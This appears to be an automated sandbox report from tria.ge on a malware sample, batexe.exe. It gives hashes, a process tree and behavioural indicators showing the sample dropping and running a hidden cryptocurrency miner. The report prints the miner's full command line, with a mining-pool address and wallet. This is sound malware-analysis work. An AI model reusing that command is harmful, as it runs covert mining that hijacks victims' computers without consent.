Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
294s -
max time network
297s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-ja -
resource tags
arch:x64arch:x86image:win10v2004-20231222-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
14/02/2024, 16:26
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20231215-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231222-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation batexe.exe Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation b2e.exe -
Executes dropped EXE 2 IoCs
pid Process 5932 b2e.exe 520 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 520 cpuminer-sse2.exe 520 cpuminer-sse2.exe 520 cpuminer-sse2.exe 520 cpuminer-sse2.exe 520 cpuminer-sse2.exe -
resource yara_rule behavioral2/memory/3148-9-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 3148 wrote to memory of 5932 3148 batexe.exe 84 PID 3148 wrote to memory of 5932 3148 batexe.exe 84 PID 3148 wrote to memory of 5932 3148 batexe.exe 84 PID 5932 wrote to memory of 5624 5932 b2e.exe 85 PID 5932 wrote to memory of 5624 5932 b2e.exe 85 PID 5932 wrote to memory of 5624 5932 b2e.exe 85 PID 5624 wrote to memory of 520 5624 cmd.exe 88 PID 5624 wrote to memory of 520 5624 cmd.exe 88
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3148 -
C:\Users\Admin\AppData\Local\Temp\9858.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\9858.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\9858.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5932 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9B17.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:5624 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:520
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8.4MB
MD5ce0f35d94c982653818d2200b9c6136f
SHA1c6b711de257bf5f6e6e71c6107f124ab472cd316
SHA256387d2c69ce716beb2a7bacf4fc7b190d670061e77a781bd03cc22a331b209462
SHA512a58a9fc1b8d770dcd812657fab257292d544a733ffda05322f6ccb55ae64988c8168b67d565c7f843c8b6e9387f7f25caec6535567bd1993a238927ca5e9b91e
-
Filesize
3.7MB
MD59aee72ab77a157f977325e6a378f7098
SHA1fd22abe08400dd8f8f3121f021566f5b4cef9aa5
SHA25658451eb20763eb1c8f084105f39a3505ec1c8990e791ddd10b3201babb98fa3b
SHA5123bfc7af8ce243ca4691a34509359491d59d44a43584844c4613bd70f18bf2d70ab1e1674fe56bda77975a2471c262cd58991b503ec6c26378acc6b19e81f8ce6
-
Filesize
3.9MB
MD5b62b9c56821cb1c32436936ae0df3e09
SHA1edaf00f46520b4a7402a0fa6fdea50d97999a5cb
SHA25625c60a0b521853a8f075ca1b5c883c5c72cfada5d2e3f19b46e2ae48470846d9
SHA5127f8d21668a42ed39a666b6b78cfdefc0f2bc7075688163b8b649a9ebb66ce78cc015d9965bbcb4f3796d0e30bb2a604c3300b44f5448454411f756b900bf6c33
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
578KB
MD5ed0f06572806f1d3fcc7a2460cefab7b
SHA1db1ff9dbe9ea00ba55b019a5b2510b9af76c98dc
SHA2567f44f27cc729181471ee9d52216b834c8fcaff8e63b320e86108ec35063b13b7
SHA512a621272cc65999f0d8647c99b1299e32dfa855f6985ba86fbd1b2bd0d974e9c3458a3a8022cdca9b6460a195c3627f83fbb79a605097fb79dd00b4feb28d4ff2
-
Filesize
669KB
MD5ea182af44efadc8f99c3a05ae4fbbe27
SHA1636ec53f4dcc8fb137be878ffdc65ddb3458a591
SHA256a948545a6287f4923b4a9019138f4ae593c07c7989425e06418aa5264d94ee74
SHA512767375d4de2eaec74700c5e20d74e3229a45ed6ccbd826aef1e608b9e358a67603664a35c34056c4fc1813b507c464066c37ec912996e19ced6159b700ba53a7
-
Filesize
400KB
MD5b0cfa972e89cec0762da4345d6a6a87b
SHA1df575e73c01aa699c7d712a65760d101e98d77fb
SHA2566cd3b45b81acd61f67671f6cbce1f5f1594ff6663c57664e551cac86af646ba1
SHA5122c15f59cfeadf87869d3ab6689616839e9cbbd363ece8f6b6ad779140822e4f5322a8d3df4a9ffc8d3bcd8f83e1fa62d2dbc4ab77035aa1766c9077db17baba4
-
Filesize
537KB
MD526c045a4eaf0f1aeba93e5466ad0f575
SHA19b8a52ca9f5ee8b0cf228b8eec9a72f54795021a
SHA256026ee631a16237dde5213806a05dd05fa673bbb81a546a2b0ef7b6ac9a436c1b
SHA5127500a8cc8b4142754b5146ba461c93e59aa0ca6f93e60a0248278b7b879756b3c43b34b07435d6f1f415f8078226f37438804786f1392d655b423c92b3cf754b
-
Filesize
545KB
MD5e06e97272230bb5245679fa71a693ea0
SHA1146fd42986a265bebe0f2d9774cc5feeeae0938d
SHA256720d96264d01bb6be7be27f65416d88d3a0bb3a4efd2340ebe902bde513bcb74
SHA512ba9ebe5cb8b88b9a8ae560c1a53c67c4521f2b720174c87dc0bb0c012bddac5be43f749e86ecbb8d8e5b37c581fea1a42eaf45e09f0034746dbfc4eb5e6cf79c
-
Filesize
734KB
MD5acecb6dceafd555d89552c3c37c9ec40
SHA118907febbad655912a6bf1346d7c4c252a37903f
SHA256aff7db9fb33e84e9a31b327a3dd321f7e20a8aa03678ed074db3864e08708832
SHA51239e8c7183b2163ed63ff61572e42742214bc33b668c1faeca5c0f22de3cc50c67fe58a5dc0558452ad8f1512304380d3cc54539aeaecedc4cb816a534f52fc60
-
Filesize
404KB
MD5d853e4e230559e53179a07b83375556a
SHA12fb439684d1a4f2f2578b95b763aa35b9cb11572
SHA2561f66604602fe971ed73f69e256190b59ccec52011f832c95732628264574e787
SHA5120943c3d97976a6d6fbf5784f192880c492f4d7e52caeef59d61c4e19eb4b0f31411d2e1da5a62eeef950782b61b87196eec0f862ef19f7427d4b92ca3441454c
-
Filesize
388KB
MD54e8f732c868154cf47fb3d460bc69c10
SHA119867505bd70f03f77995bd5d98e0ebbbbb16e7e
SHA256b351fa0f2b942e3158f4aa4c7920c10384c3d5e23156b2c719e06b4f0a4a9e28
SHA512827b7f697635c2062e0f43b18a6ebfd76c34801137c1c792ca66027b3ae6439b0a028d91afb2f1d426f3b7099f8bd9c43be5f8eb207ee62223f928dbfbd7f0f5
-
Filesize
471KB
MD5e3f847679293667c6d5f545d6450d94c
SHA137382af248a744f727ce9b52de8dd502a3706833
SHA25629cd2fa1a81a6b3f3740398245fcc3ca4adef53880e6933954326f32f36eb30c
SHA512e83f7f75ea444d934d99e035b792fdcf20a4a3dda6e1636fc6217bb9e5a6f9fe46adbc3cf89f58f95559fbc21a8c3741116cda2eccb02b8b4b42a6194d58e4d7
-
Filesize
509KB
MD5b0a5c8de7559d0f3b9bb32e97e6b65f3
SHA1e547376cb69834fb82fb672883fdbb89c4852da2
SHA256241e777db1bf158315239dbc44a15a8ce3330604939cdd7b1fb1a5fecfb6ede4
SHA5122539fe6dec2046b978ba67a75437991f658f4b015dcc121d456368b2ce0a34ba73e38aa7d5e5b6f94b0278ea75799454f1fba4bce83a61e9b15374637f2b6edc
-
Filesize
592KB
MD5d5cdab4941938ff3b8ea02f7e30aa5e5
SHA1083bec8fc980dc134afc46e558b08e021d65162e
SHA256f8b666fb63d4f3d535526d1420764ad971e2c8d20d2eca2335e66961f68b6257
SHA512c53d05137d0a1c1e2971926a30bc4dacc2d5dc47bb1b9a70dd605eef890ab1b4184c551416c2745a82fee704c171d6e84f30af7dbf0eb7405f7d50958ac28b3c